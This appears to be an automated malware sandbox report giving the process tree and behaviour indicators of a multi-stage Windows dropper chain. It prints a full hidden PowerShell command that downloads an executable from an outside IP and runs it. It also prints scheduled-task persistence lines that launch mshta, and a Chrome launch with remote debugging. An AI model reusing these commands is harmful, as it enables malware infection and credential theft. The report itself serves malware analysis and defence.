pid Process 2568 2r6275.exe 2568 2r6275.exe 2568 2r6275.exe 2568 2r6275.exe 2568 2r6275.exe 2568 2r6275.exe 1644 powershell.exe 1644 powershell.exe 1644 powershell.exe 1116 powershell.exe 1116 powershell.exe 1116 powershell.exe 5024 8I3X3EA1A40B3S1KC14QDE1AWC5.exe 5024 8I3X3EA1A40B3S1KC14QDE1AWC5.exe 3572 TempSMWIFCSQGTNKYW9PVNOL6IXC6DDO2UE4.EXE 3572 TempSMWIFCSQGTNKYW9PVNOL6IXC6DDO2UE4.EXE 4520 3f65O.exe 4520 3f65O.exe 4520 3f65O.exe 4520 3f65O.exe 4932 powershell.exe 4932 powershell.exe 4932 powershell.exe 4520 3f65O.exe 4520 3f65O.exe 1588 powershell.exe 1588 powershell.exe 1588 powershell.exe 1900 chrome.exe 1900 chrome.exe 4980 powershell.exe 4980 powershell.exe 4980 powershell.exe 4520 3f65O.exe 4520 3f65O.exe 5192 WiseTurbo.exe 4520 3f65O.exe 4520 3f65O.exe 5600 WiseTurbo.exe 5616 483d2fa8a0d53818306efeb32d3.exe 5616 483d2fa8a0d53818306efeb32d3.exe 5600 WiseTurbo.exe 5600 WiseTurbo.exe 2028 msedge.exe 2028 msedge.exe 5524 msedge.exe 5524 msedge.exe 5524 msedge.exe 5576 msedge.exe 5576 msedge.exe 5576 msedge.exe 5576 msedge.exe 5576 msedge.exe 5576 msedge.exe 5576 msedge.exe 5576 msedge.exe 5576 msedge.exe 5840 cmd.exe 5840 cmd.exe 5840 cmd.exe 5840 cmd.exe 4520 3f65O.exe 4520 3f65O.exe 6128 cronikxqqq.exe -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 5600 WiseTurbo.exe 5840 cmd.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs
pid Process 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 5524 msedge.exe 5524 msedge.exe 3652 chrome.exe 3652 chrome.exe 3652 chrome.exe 3652 chrome.exe 452 msedge.exe 452 msedge.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
description pid Process Token: SeDebugPrivilege 1644 powershell.exe Token: SeDebugPrivilege 1116 powershell.exe Token: SeDebugPrivilege 4932 powershell.exe Token: SeDebugPrivilege 1588 powershell.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeDebugPrivilege 4980 powershell.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeShutdownPrivilege 1900 chrome.exe Token: SeCreatePagefilePrivilege 1900 chrome.exe Token: SeDebugPrivilege 6000 cronikxqqq.exe Token: SeShutdownPrivilege 3652 chrome.exe Token: SeCreatePagefilePrivilege 3652 chrome.exe Token: SeShutdownPrivilege 3652 chrome.exe Token: SeCreatePagefilePrivilege 3652 chrome.exe Token: SeShutdownPrivilege 3652 chrome.exe Token: SeCreatePagefilePrivilege 3652 chrome.exe Token: SeShutdownPrivilege 3652 chrome.exe Token: SeCreatePagefilePrivilege 3652 chrome.exe Token: SeShutdownPrivilege 3652 chrome.exe Token: SeCreatePagefilePrivilege 3652 chrome.exe Token: SeShutdownPrivilege 3652 chrome.exe Token: SeCreatePagefilePrivilege 3652 chrome.exe Token: SeShutdownPrivilege 3652 chrome.exe Token: SeCreatePagefilePrivilege 3652 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4180 16378c5bc0.exe 4180 16378c5bc0.exe 4180 16378c5bc0.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 1900 chrome.exe 5524 msedge.exe 5524 msedge.exe 5524 msedge.exe 5524 msedge.exe 5524 msedge.exe 5524 msedge.exe 5524 msedge.exe 5524 msedge.exe 5524 msedge.exe 5524 msedge.exe 5524 msedge.exe 5524 msedge.exe 5524 msedge.exe 5524 msedge.exe 5524 msedge.exe 5524 msedge.exe 5524 msedge.exe 5524 msedge.exe 5524 msedge.exe 5524 msedge.exe 5524 msedge.exe 5524 msedge.exe 5524 msedge.exe 5524 msedge.exe 5524 msedge.exe 3652 chrome.exe 3652 chrome.exe 3652 chrome.exe 3652 chrome.exe 3652 chrome.exe 3652 chrome.exe 3652 chrome.exe 3652 chrome.exe 3652 chrome.exe 3652 chrome.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 4180 16378c5bc0.exe 4180 16378c5bc0.exe 4180 16378c5bc0.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4772 wrote to memory of 1356 4772 ff052d1ed5c43bf2024119b2971ea7cab677dc808317e258ffebcd3ce73c1936.exe 85 PID 4772 wrote to memory of 1356 4772 ff052d1ed5c43bf2024119b2971ea7cab677dc808317e258ffebcd3ce73c1936.exe 85 PID 4772 wrote to memory of 1356 4772 ff052d1ed5c43bf2024119b2971ea7cab677dc808317e258ffebcd3ce73c1936.exe 85 PID 1356 wrote to memory of 3004 1356 m1c06.exe 86 PID 1356 wrote to memory of 3004 1356 m1c06.exe 86 PID 1356 wrote to memory of 3004 1356 m1c06.exe 86 PID 3004 wrote to memory of 1460 3004 1F01J8.exe 90 PID 3004 wrote to memory of 1460 3004 1F01J8.exe 90 PID 3004 wrote to memory of 1460 3004 1F01J8.exe 90 PID 1356 wrote to memory of 2568 1356 m1c06.exe 91 PID 1356 wrote to memory of 2568 1356 m1c06.exe 91 PID 1356 wrote to memory of 2568 1356 m1c06.exe 91 PID 1460 wrote to memory of 1688 1460 rapes.exe 96 PID 1460 wrote to memory of 1688 1460 rapes.exe 96 PID 1460 wrote to memory of 1688 1460 rapes.exe 96 PID 1688 wrote to memory of 4364 1688 amnew.exe 98 PID 1688 wrote to memory of 4364 1688 amnew.exe 98 PID 1688 wrote to memory of 4364 1688 amnew.exe 98 PID 1460 wrote to memory of 4180 1460 rapes.exe 101 PID 1460 wrote to memory of 4180 1460 rapes.exe 101 PID 1460 wrote to memory of 4180 1460 rapes.exe 101 PID 4180 wrote to memory of 4092 4180 16378c5bc0.exe 102 PID 4180 wrote to memory of 4092 4180 16378c5bc0.exe 102 PID 4180 wrote to memory of 4092 4180 16378c5bc0.exe 102 PID 4180 wrote to memory of 3884 4180 16378c5bc0.exe 103 PID 4180 wrote to memory of 3884 4180 16378c5bc0.exe 103 PID 4180 wrote to memory of 3884 4180 16378c5bc0.exe 103 PID 4092 wrote to memory of 2396 4092 cmd.exe 105 PID 4092 wrote to memory of 2396 4092 cmd.exe 105 PID 4092 wrote to memory of 2396 4092 cmd.exe 105 PID 3884 wrote to memory of 1644 3884 mshta.exe 106 PID 3884 wrote to memory of 1644 3884 mshta.exe 106 PID 3884 wrote to memory of 1644 3884 mshta.exe 106 PID 1460 wrote to memory of 3944 1460 rapes.exe 108 PID 1460 wrote to memory of 3944 1460 rapes.exe 108 PID 1460 wrote to memory of 3944 1460 rapes.exe 108 PID 3944 wrote to memory of 4980 3944 cmd.exe 110 PID 3944 wrote to memory of 4980 3944 cmd.exe 110 PID 3944 wrote to memory of 4980 3944 cmd.exe 110 PID 3944 wrote to memory of 3256 3944 cmd.exe 111 PID 3944 wrote to memory of 3256 3944 cmd.exe 111 PID 3944 wrote to memory of 3256 3944 cmd.exe 111 PID 3256 wrote to memory of 1116 3256 cmd.exe 112 PID 3256 wrote to memory of 1116 3256 cmd.exe 112 PID 3256 wrote to memory of 1116 3256 cmd.exe 112 PID 2568 wrote to memory of 5024 2568 2r6275.exe 113 PID 2568 wrote to memory of 5024 2568 2r6275.exe 113 PID 2568 wrote to memory of 5024 2568 2r6275.exe 113 PID 1644 wrote to memory of 3572 1644 powershell.exe 114 PID 1644 wrote to memory of 3572 1644 powershell.exe 114 PID 1644 wrote to memory of 3572 1644 powershell.exe 114 PID 4772 wrote to memory of 4520 4772 ff052d1ed5c43bf2024119b2971ea7cab677dc808317e258ffebcd3ce73c1936.exe 115 PID 4772 wrote to memory of 4520 4772 ff052d1ed5c43bf2024119b2971ea7cab677dc808317e258ffebcd3ce73c1936.exe 115 PID 4772 wrote to memory of 4520 4772 ff052d1ed5c43bf2024119b2971ea7cab677dc808317e258ffebcd3ce73c1936.exe 115 PID 3944 wrote to memory of 3168 3944 cmd.exe 116 PID 3944 wrote to memory of 3168 3944 cmd.exe 116 PID 3944 wrote to memory of 3168 3944 cmd.exe 116 PID 3168 wrote to memory of 4932 3168 cmd.exe 133 PID 3168 wrote to memory of 4932 3168 cmd.exe 133 PID 3168 wrote to memory of 4932 3168 cmd.exe 133 PID 4520 wrote to memory of 1900 4520 3f65O.exe 118 PID 4520 wrote to memory of 1900 4520 3f65O.exe 118 PID 1900 wrote to memory of 3492 1900 chrome.exe 119 PID 1900 wrote to memory of 3492 1900 chrome.exe 119
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2776
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2188
-
-
C:\Users\Admin\AppData\Local\Temp\ff052d1ed5c43bf2024119b2971ea7cab677dc808317e258ffebcd3ce73c1936.exe"C:\Users\Admin\AppData\Local\Temp\ff052d1ed5c43bf2024119b2971ea7cab677dc808317e258ffebcd3ce73c1936.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4772 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\m1c06.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\m1c06.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1F01J8.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1F01J8.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"4⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1460 -
C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe"C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1688 -
C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"6⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:4364 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"7⤵
- Executes dropped EXE
PID:5248 -
C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5788
-
-
-
C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:6000 -
C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"C:\Users\Admin\AppData\Local\Temp\10001960101\cronikxqqq.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:6128
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6000 -s 9728⤵
- Program crash
PID:5784
-
-
-
C:\Users\Admin\AppData\Local\Temp\10005500101\alex122121.exe"C:\Users\Admin\AppData\Local\Temp\10005500101\alex122121.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5936 -
C:\Users\Admin\AppData\Local\Temp\10005500101\alex122121.exe"C:\Users\Admin\AppData\Local\Temp\10005500101\alex122121.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5720
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5936 -s 9608⤵
- Program crash
PID:5336
-
-
-
C:\Users\Admin\AppData\Local\Temp\10016760101\files.exe"C:\Users\Admin\AppData\Local\Temp\10016760101\files.exe"7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:764
-
-
C:\Users\Admin\AppData\Local\Temp\10016830101\212261a833.exe"C:\Users\Admin\AppData\Local\Temp\10016830101\212261a833.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:232 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"8⤵
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
PID:5912
-
-
-
C:\Users\Admin\AppData\Local\Temp\10016840101\6406e1fd4e.exe"C:\Users\Admin\AppData\Local\Temp\10016840101\6406e1fd4e.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5772 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"8⤵
- System Location Discovery: System Language Discovery
PID:3076
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10097710101\16378c5bc0.exe"C:\Users\Admin\AppData\Local\Temp\10097710101\16378c5bc0.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4180 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn G9XbRmayhCL /tr "mshta C:\Users\Admin\AppData\Local\Temp\8fkVCgWTT.hta" /sc minute /mo 25 /ru "Admin" /f6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4092 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn G9XbRmayhCL /tr "mshta C:\Users\Admin\AppData\Local\Temp\8fkVCgWTT.hta" /sc minute /mo 25 /ru "Admin" /f7⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2396
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\8fkVCgWTT.hta6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3884 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'SMWIFCSQGTNKYW9PVNOL6IXC6DDO2UE4.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1644 -
C:\Users\Admin\AppData\Local\TempSMWIFCSQGTNKYW9PVNOL6IXC6DDO2UE4.EXE"C:\Users\Admin\AppData\Local\TempSMWIFCSQGTNKYW9PVNOL6IXC6DDO2UE4.EXE"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3572
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10097720121\am_no.cmd" "5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3944 -
C:\Windows\SysWOW64\timeout.exetimeout /t 26⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3256 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1116
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3168 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4932
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- System Location Discovery: System Language Discovery
PID:3380 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"7⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1588
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "WTpDMmaYW5O" /tr "mshta \"C:\Temp\YUShxcADL.hta\"" /sc minute /mo 25 /ru "Admin" /f6⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1312
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\YUShxcADL.hta"6⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:4932 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4980 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"8⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5616
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10098440101\z3SJkC5.exe"C:\Users\Admin\AppData\Local\Temp\10098440101\z3SJkC5.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5356 -
C:\Windows\TEMP\{7068B816-142F-4DC7-B20A-5BB9CEED89BA}\.cr\z3SJkC5.exe"C:\Windows\TEMP\{7068B816-142F-4DC7-B20A-5BB9CEED89BA}\.cr\z3SJkC5.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10098440101\z3SJkC5.exe" -burn.filehandle.attached=764 -burn.filehandle.self=8086⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:5284 -
C:\Windows\TEMP\{823917EB-A798-4E8D-BD5E-476680E00A5D}\.ba\WiseTurbo.exeC:\Windows\TEMP\{823917EB-A798-4E8D-BD5E-476680E00A5D}\.ba\WiseTurbo.exe7⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5192 -
C:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exeC:\Users\Admin\AppData\Roaming\streamfirefox\WiseTurbo.exe8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:5600 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe9⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:5840 -
C:\Users\Admin\AppData\Local\Temp\WatcherUpdate_test.exeC:\Users\Admin\AppData\Local\Temp\WatcherUpdate_test.exe10⤵
- Loads dropped DLL
PID:5428
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5284 -s 8767⤵
- Program crash
PID:5544
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5284 -s 7567⤵
- Program crash
PID:6056
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10098450101\8jQumY5.exe"C:\Users\Admin\AppData\Local\Temp\10098450101\8jQumY5.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3756
-
-
C:\Users\Admin\AppData\Local\Temp\10098460101\BXxKvLN.exe"C:\Users\Admin\AppData\Local\Temp\10098460101\BXxKvLN.exe"5⤵
- Executes dropped EXE
PID:3708
-
-
C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:5552 -
C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe"6⤵
- Executes dropped EXE
PID:2632
-
-
C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe"C:\Users\Admin\AppData\Local\Temp\10098470101\mAtJWNv.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:4084 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"7⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3652 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7fff15f9cc40,0x7fff15f9cc4c,0x7fff15f9cc588⤵PID:3124
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1964,i,2755577746815127364,14993534339733135269,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1956 /prefetch:28⤵PID:5800
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2120,i,2755577746815127364,14993534339733135269,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2104 /prefetch:38⤵PID:5564
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2292,i,2755577746815127364,14993534339733135269,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2672 /prefetch:88⤵PID:6136
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3220,i,2755577746815127364,14993534339733135269,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3232 /prefetch:18⤵
- Uses browser remote debugging
PID:2724
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3256,i,2755577746815127364,14993534339733135269,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3404 /prefetch:18⤵
- Uses browser remote debugging
PID:2276
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4024,i,2755577746815127364,14993534339733135269,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4016 /prefetch:18⤵
- Uses browser remote debugging
PID:6132
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3680,i,2755577746815127364,14993534339733135269,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4724 /prefetch:88⤵PID:2348
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3860,i,2755577746815127364,14993534339733135269,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4500 /prefetch:88⤵PID:4416
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4876,i,2755577746815127364,14993534339733135269,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4600 /prefetch:88⤵PID:1156
-
-
